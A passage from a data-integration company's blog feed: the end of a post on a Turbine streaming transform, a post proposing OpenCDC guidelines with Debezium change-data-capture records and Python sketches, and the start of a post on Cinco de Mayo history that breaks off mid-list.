&lt;p&gt;With the data flow of our app written, the only remaining step is to write the transformation function that will process our streaming user records. In our example case, our clickstream records contain a field with first and last names concatenated together, like “John Doe.” We simply need to split this into separate fields — first_name and last_name — before ingesting it into a Data Lake.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;transform&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;user_stream&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; t&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;List&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; t&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;List&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
	updated &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; user_click &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; user_stream&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
		value_to_update &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; user_click&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;value
		full_name &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; value_to_update&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&quot;payload&quot;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&quot;user&quot;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&quot;name&quot;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;split&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&quot; &quot;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		first_name &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; full_name&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
		last_name &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; full_name&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
		updated&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;append&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
		Record&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;key&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;user_click&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;key&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; value&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&quot;first_name&quot;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; 
			first_name&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &quot;last_name&quot;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; last_name&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; timestamp&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;user_click&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;timestamp&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; updated&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;With a little configuration and setup, &lt;strong&gt;our Turbine data app can ingest and process complex streaming data, and it does so with very few lines of code&lt;/strong&gt;!&lt;/p&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;Data apps, though relatively new, bring with them a whole host of benefits. These benefits include the efficiency and streamlining of processes along with the simplicity of onboarding new engineers. Building data apps with a tool like Turbine is a perfect approach to today’s complex real-time and near-real-time data processing needs. The ability to approach a normally complicated data problem with a straightforward codebase — while offloading the complexity related to architecture and streaming data — is a game-changer for developers.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[A Proposal for Better Interoperability with Change Data Capture]]></title><description><![CDATA[Change Data Capture (CDC) is a general term for a mechanism that communicates not just the current state of some data in an upstream resource.]]></description><link>https://meroxa.com/blog/a-proposal-for-better-interoperability-with-change-data-capture</link><guid isPermaLink="false">https://meroxa.com/blog/a-proposal-for-better-interoperability-with-change-data-capture</guid><dc:creator><![CDATA[Ali Hamidi]]></dc:creator><pubDate>Thu, 02 Jun 2022 16:39:00 GMT</pubDate><content:encoded>&lt;h3&gt;What is Change Data Capture?&lt;/h3&gt;
&lt;p&gt;Change Data Capture (CDC) is a general term for a mechanism that communicates not just the current state of some data in an upstream resource, but the actual operation that caused the change in that data.&lt;/p&gt;
&lt;p&gt;Consider the case of traditional (non-CDC) data integration, where we have a pipeline that pulls records from a Postgres operational database at some regular interval. In this case, what you end up with is a series of snapshots of what the database looked like at each interval.&lt;/p&gt;
&lt;p&gt;A small improvement would be incremental syncing, where we look only for new records and pull those instead of every record each time. This is better, since it is generally orders of magnitude more efficient.&lt;/p&gt;
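&lt;p&gt;As a rough sketch of the idea (the table and column names here are hypothetical, not from any Meroxa API), incremental syncing tracks a high-water mark and fetches only rows beyond it on each interval:&lt;/p&gt;

```python
# Hypothetical sketch of incremental syncing: remember the highest id seen
# so far and pull only newer rows on each polling interval.
def incremental_sync(fetch_newer_rows, last_seen_id=0):
    """fetch_newer_rows(cursor) returns rows with id > cursor, oldest first."""
    new_rows = fetch_newer_rows(last_seen_id)
    for row in new_rows:
        last_seen_id = max(last_seen_id, row["id"])
    return new_rows, last_seen_id

# Demo against an in-memory "table" standing in for a real database query.
table = [{"id": 1, "email": "a@example.com"}, {"id": 2, "email": "b@example.com"}]
rows, cursor = incremental_sync(lambda c: [r for r in table if r["id"] > c])
```

&lt;p&gt;A second call with the returned cursor fetches nothing until new rows appear, which is what makes this cheaper than re-pulling every record.&lt;/p&gt;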
&lt;p&gt;However, CDC improves on this further by providing not only new records but any record that was changed, along with details about the operation that triggered the change. For example, suppose a record was updated (i.e., a single field received a new value). CDC can provide additional metadata indicating that the record was an update and, depending on the resource/tooling, can even capture the before and after states, highlighting the exact change.&lt;/p&gt;
&lt;p&gt;It’s clear that CDC provides numerous advantages, so why isn’t it used everywhere for everything?&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1120/1*3nZAEJsjz95oGu_q4BCIiQ.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Kafka Connect and CDC Right now&lt;/h3&gt;
&lt;p&gt;We can’t really discuss CDC without talking about &lt;a href=&quot;https://debezium.io/&quot;&gt;Debezium&lt;/a&gt;. Debezium is the umbrella project for a collection of Kafka Connect connectors focused on CDC, maintained by the team at Red Hat.&lt;/p&gt;
&lt;p&gt;In our opinion, the Debezium connectors are excellent. They’re well designed, battle-tested, and well documented.&lt;/p&gt;
&lt;p&gt;Here’s an example of a CDC record from the Debezium Postgres Source Connector:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;...&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;before&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	  &lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	  &lt;span class=&quot;token string-property property&quot;&gt;&quot;first_name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Anne Marie&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	  &lt;span class=&quot;token string-property property&quot;&gt;&quot;last_name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Kretchmar&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	  &lt;span class=&quot;token string-property property&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;oldemail@example.com&quot;&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;after&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;first_name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Anne Marie&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;last_name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Kretchmar&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;newemail@example.com&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;source&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;version&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;2.0.0.Alpha1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;connector&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgresql&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;PostgreSQL_server&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;ts_ms&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1559033904863&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;snapshot&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;db&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;public&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;table&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;customers&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;txId&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;556&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;lsn&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;24023128&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;xmin&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;null&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;op&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;u&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;ts_ms&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1465584025523&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In this example, a user’s email has been updated in-place, so an &lt;em&gt;update&lt;/em&gt; record (&lt;code class=&quot;language-text&quot;&gt;&quot;op&quot;: &quot;u&quot;&lt;/code&gt;) was emitted showing the previous email (&lt;code class=&quot;language-text&quot;&gt;oldemail@example.com&lt;/code&gt;) and the new one (&lt;code class=&quot;language-text&quot;&gt;newemail@example.com&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;Using the Debezium connectors, you can build downstream apps that consume this data and intelligently act on each type of operation.&lt;/p&gt;
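&lt;p&gt;For instance, a downstream consumer might dispatch on the op field of a Debezium-style payload like the one above (a minimal sketch; the field names follow the example record, and the handler itself is hypothetical):&lt;/p&gt;

```python
# Sketch of a consumer that acts on each Debezium operation type.
# Field names ("op", "before", "after") follow the example payload above.
def handle_change(payload):
    op = payload["op"]
    if op == "c":   # create: insert the newly created row
        return ("insert", payload["after"])
    if op == "u":   # update: apply the new state of the row
        return ("update", payload["after"])
    if op == "d":   # delete: remove the row identified by its prior state
        return ("delete", payload["before"])
    return ("insert", payload["after"])  # "r": rows read during a snapshot

action, row = handle_change({
    "op": "u",
    "before": {"id": 1, "email": "oldemail@example.com"},
    "after": {"id": 1, "email": "newemail@example.com"},
})
```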
&lt;p&gt;Where things fall apart is once you look into the sink (or destination) side of data integration. Very few Kafka Connect sink connectors can take advantage of the CDC data provided by the Debezium connectors.&lt;/p&gt;
&lt;p&gt;In many cases you’re forced to use a provided &lt;a href=&quot;https://debezium.io/documentation/reference/2.0/transformations/event-flattening.html&quot;&gt;transform&lt;/a&gt; to “unwrap” the records (effectively stripping away all of the CDC data), leaving only the final (“after”) state of the record.&lt;/p&gt;
&lt;p&gt;The practical implication is that you lose the ability to map updates and deletes, and you are often left with append-only style inserts.&lt;/p&gt;
&lt;p&gt;Here’s what the previous CDC record looks like after it has been &lt;em&gt;unwrapped&lt;/em&gt; so that it can be pushed down to sink connectors:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;...&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;first_name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Anne Marie&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;last_name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Kretchmar&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;newemail@example.com&quot;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;What’s the ideal situation?&lt;/h3&gt;
&lt;p&gt;Ideally, &lt;em&gt;all&lt;/em&gt; sink/destination connectors would support &lt;em&gt;all&lt;/em&gt; CDC operations and map them to whatever makes sense for the resource. If the resource supports updates, the connector updates the correct record. If it doesn’t, the connector can create a new record with the operation included as a field.&lt;/p&gt;
&lt;p&gt;This way, resources such as operational databases can be kept in sync (with updates and deletes being applied), while append-only behavior (if desired, e.g., for compliance) can still be enforced, optionally at the sink instead.&lt;/p&gt;
&lt;h3&gt;What is OpenCDC?&lt;/h3&gt;
&lt;p&gt;In order to move the community toward the goal of ubiquitous CDC interoperability, Meroxa is proposing, at least initially, a set of guidelines under the project name OpenCDC.&lt;/p&gt;
&lt;p&gt;Specifically, we’re advocating for standardizing on a minimal set of CDC operations loosely based on those introduced by the Debezium connectors:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Create (&lt;code class=&quot;language-text&quot;&gt;c&lt;/code&gt;) - Newly created records&lt;/li&gt;
&lt;li&gt;Read (&lt;code class=&quot;language-text&quot;&gt;r&lt;/code&gt;) - Records read as part of a snapshot&lt;/li&gt;
&lt;li&gt;Update (&lt;code class=&quot;language-text&quot;&gt;u&lt;/code&gt;) - Records that have been updated&lt;/li&gt;
&lt;li&gt;Delete (&lt;code class=&quot;language-text&quot;&gt;d&lt;/code&gt;) - Records that have been deleted&lt;/li&gt;
&lt;/ul&gt;
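&lt;p&gt;To make the mapping concrete, here is a sketch of how a sink that supports updates might translate each of these operations into SQL (the table, key, and dialect are hypothetical, and a real connector would use parameterized queries):&lt;/p&gt;

```python
# Hypothetical mapping from OpenCDC-style operation codes to SQL statements.
def to_sql(op, table, key, record):
    if op in ("c", "r"):  # creates and snapshot reads both become inserts
        cols = ", ".join(record)
        vals = ", ".join(repr(v) for v in record.values())
        return f"INSERT INTO {table} ({cols}) VALUES ({vals})"
    if op == "u":         # updates target the existing row by its key
        assignments = ", ".join(f"{k} = {v!r}" for k, v in record.items())
        return f"UPDATE {table} SET {assignments} WHERE {key} = {record[key]!r}"
    if op == "d":         # deletes remove the row by its key
        return f"DELETE FROM {table} WHERE {key} = {record[key]!r}"
    raise ValueError(f"unknown operation: {op}")

sql = to_sql("u", "customers", "id", {"id": 1, "email": "newemail@example.com"})
```

&lt;p&gt;A sink that cannot update in place could instead route every operation through the insert branch, adding the operation code as an extra column to preserve append-only behavior.&lt;/p&gt;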
&lt;p&gt;The above list provides a base starting point. There are compelling arguments for supporting (and distinguishing) additional operations, such as DDL operations and/or resource-specific operations such as truncate.&lt;/p&gt;
&lt;h3&gt;What’s Next&lt;/h3&gt;
&lt;p&gt;We want to shape these guidelines based on input from the community. If you’re interested in helping to define these guidelines, contact us at &lt;a href=&quot;mailto:info@meroxa.com&quot;&gt;info@meroxa.com&lt;/a&gt; with the subject line &lt;em&gt;&lt;strong&gt;OpenCDC&lt;/strong&gt;&lt;/em&gt; or connect with us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;FAQ&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Why “guidelines” and not a standard?&lt;/strong&gt; Our long-term goal is ultimately to have a standard or specification for OpenCDC, but to get there we first need to land on the set of core operations to support. By starting with guidelines, we can shape them based on input and feedback from the community.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Is OpenCDC a format?&lt;/strong&gt; The term “format” is overloaded in the data integration space, and we’re wary of using it in the context of OpenCDC. Ideally, OpenCDC would be a specification for the contents of the OpenCDC record (i.e. the fields themselves and their data types). The actual format would be independent: the record could be encoded as Avro, Protobuf, or JSON.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Who is involved with this?&lt;/strong&gt; We’re currently talking to a large (and growing) list of organizations that share our interest in delivering CDC interoperability. If you’re interested in getting involved, please reach out to us at &lt;a href=&quot;mailto:info@meroxa.com&quot;&gt;info@meroxa.com&lt;/a&gt; or jump into our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord server&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Who “owns” OpenCDC?&lt;/strong&gt; Our intention is to operate OpenCDC as a community-driven project. Ideally, one that is governed by an established foundation such as the CNCF or similar.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Hold the Guacamole: Rethinking Cinco de Mayo]]></title><description><![CDATA[Cinco de Mayo is here, and though many people make reservations with friends to eat at their favorite taco spot, let’s take time to honor Mexican heritage.]]></description><link>https://meroxa.com/blog/hold-the-guacamole-rethinking-cinco-de-mayo</link><guid isPermaLink="false">https://meroxa.com/blog/hold-the-guacamole-rethinking-cinco-de-mayo</guid><dc:creator><![CDATA[Idalin Bobe]]></dc:creator><pubDate>Thu, 05 May 2022 18:27:00 GMT</pubDate><content:encoded>&lt;p&gt;Cinco de Mayo is here, and though many people make reservations with friends to eat at their favorite taco spot, let’s hold the guacamole and margarita and take time to honor Mexican heritage.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Two Truths and A Lie:&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Mexican heritage is NOT about drinking.&lt;/li&gt;
&lt;li&gt;Most Mexicans don’t celebrate Cinco de Mayo.&lt;/li&gt;
&lt;li&gt;Cinco de Mayo is Mexico’s Independence Day.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Sadly, many people in America celebrate Cinco de Mayo because they think it’s Mexico’s Independence Day. However, September 16 is Mexico’s Independence Day. Cinco de Mayo commemorates the Battle of Puebla, where Mexican forces defeated Napoleon III’s army in 1862.&lt;/p&gt;
&lt;h3&gt;How Did Cinco De Mayo Celebrations Get Started in the U.S.?&lt;/h3&gt;
&lt;p&gt;In the 1960s, &lt;a href=&quot;https://www.history.com/news/chicano-movement&quot;&gt;Chicano activists&lt;/a&gt; in the U.S. wanted to stand in solidarity with the civil rights movement and reclaim a time when people united, against all odds, to defeat colonialism — AND WON! The Chicano activists in the Southwest and west coast of America celebrated Cinco de Mayo to reclaim history and honor the mostly poor, primarily &lt;a href=&quot;https://globalgrind.com/5050249/happy-cinco-de-mayo-five-fast-facts-about-the-holiday-linked-to-african-american-history/&quot;&gt;Afro-Mexican&lt;/a&gt; and indigenous soldiers, who fought against a mighty European colonial force.&lt;/p&gt;
&lt;p&gt;The civil rights movement in the United States called for solidarity across all working-class communities, especially Black and Brown communities. During this era, leaders like &lt;a href=&quot;https://en.wikipedia.org/wiki/Cesar_Chavez&quot;&gt;Cesar Chavez&lt;/a&gt; and &lt;a href=&quot;https://en.wikipedia.org/wiki/Dolores_Huerta&quot;&gt;Dolores Huerta&lt;/a&gt; organized farmworkers, undocumented youth, and housing advocates to stand up for human rights. In a ploy to grow closer to this young, vibrant, and growing population, corporate America promised to make donations across several organizations in exchange for joining the Cinco de Mayo celebrations. Sadly, it wasn’t long before mass marketing campaigns took over the day and co-opted the movement with &lt;a href=&quot;https://www.cwu.edu/sites/default/files/Sanchez%20Cinco%20de%20Mayo%201.pdf&quot;&gt;Drink-O-Mayo&lt;/a&gt; slogans. By the 1990s, thanks to the commercialization of the day, many people in America had no idea what Cinco de Mayo represented, but we knew it was a day to celebrate with a drink.&lt;/p&gt;
&lt;h3&gt;What to do this Cinco De Mayo?&lt;/h3&gt;
&lt;p&gt;As individuals who care about justice, it is always good to be mindful of our actions and how we can unknowingly contribute to negative stereotypes. If we want to celebrate Cinco de Mayo with food and drinks, at the bare minimum we should celebrate with foods embraced by Mexican culture (sorry, Mexicans do not eat burritos) and purchase food items from Latinx-owned companies.&lt;/p&gt;
&lt;p&gt;More importantly, we can also honor the many people of Mexican ancestry who struggled to advance social justice and human rights. Today, Mexicans still struggle to be treated with respect and dignity. Here are some books to learn more about U.S.-Mexico history:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.haymarketbooks.org/books/1655-the-border-crossed-us&quot;&gt;The Border Crossed Us: The Case for Opening the US-Mexico Border&lt;/a&gt; by Justin Akers Chacón&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.haymarketbooks.org/books/1086-no-one-is-illegal-updated-edition&quot;&gt;No One is Illegal: Fighting Racism and State Violence on the U.S.-Mexico Border&lt;/a&gt; by Justin Akers Chacón and Mike Davis&lt;/li&gt;
